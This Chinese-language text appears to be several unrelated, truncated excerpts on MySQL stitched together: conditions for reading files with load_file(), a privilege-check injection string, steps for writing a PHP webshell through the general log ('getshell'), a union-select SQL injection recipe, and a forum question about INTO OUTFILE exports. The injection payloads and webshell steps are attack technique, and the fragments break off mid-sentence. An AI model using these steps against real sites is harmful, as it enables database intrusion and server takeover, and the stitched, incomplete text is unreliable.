load_file()函数的使用: 1.使用条件 ①有读取文件的权限 r and (select count(*) from mysql.user)>0 如果返回正常则说明有权限,反之没有 ②文件大小不能超过max_allowed_packet ③secure_file_priv的值不为NULL 查看mysql是否有对函数load_file(),outfile()函数的限制(securefilepriv的值是否为NULL) show global variables like '%secure%
部分来源于:先知社区 MYSQL-getshell篇 通过日志getshell 查看日志的物理路径(绝对路径) show variables like '%general%'; 打开日志记录内容 set global general_log = on; 重新设置日志路径(绝对路径) set global general_log_file = '日志绝对路径'; 写入webshell 通过SQL的查询语句,查询的语句会被记录在日志中,以此达到将php的webshell写入到日志文件中 select
1.SQL Injection(sql注入) 1暴字段长度 Order by num/* 2.匹配字段 and 1=1 union select 1,2,3,4,5--.n/* 3.暴露字段位置 and 1=2 union select 1,2,3,4,5-..n/* 4.利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select version() /* and 1=2
方案有很多种,我这里简单说一下: 1. into outfile SELECT * FROM mytable INTO OUTFILE '/tmp/mytable.csv' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n'; 在我使用过程中发现一个特别严重问题,这里面不能插入查询条件,比如where这些,也就是说只能整表导出,不知道是不是我的写法有问题,有知道朋友请给我留言. 第二个问题是,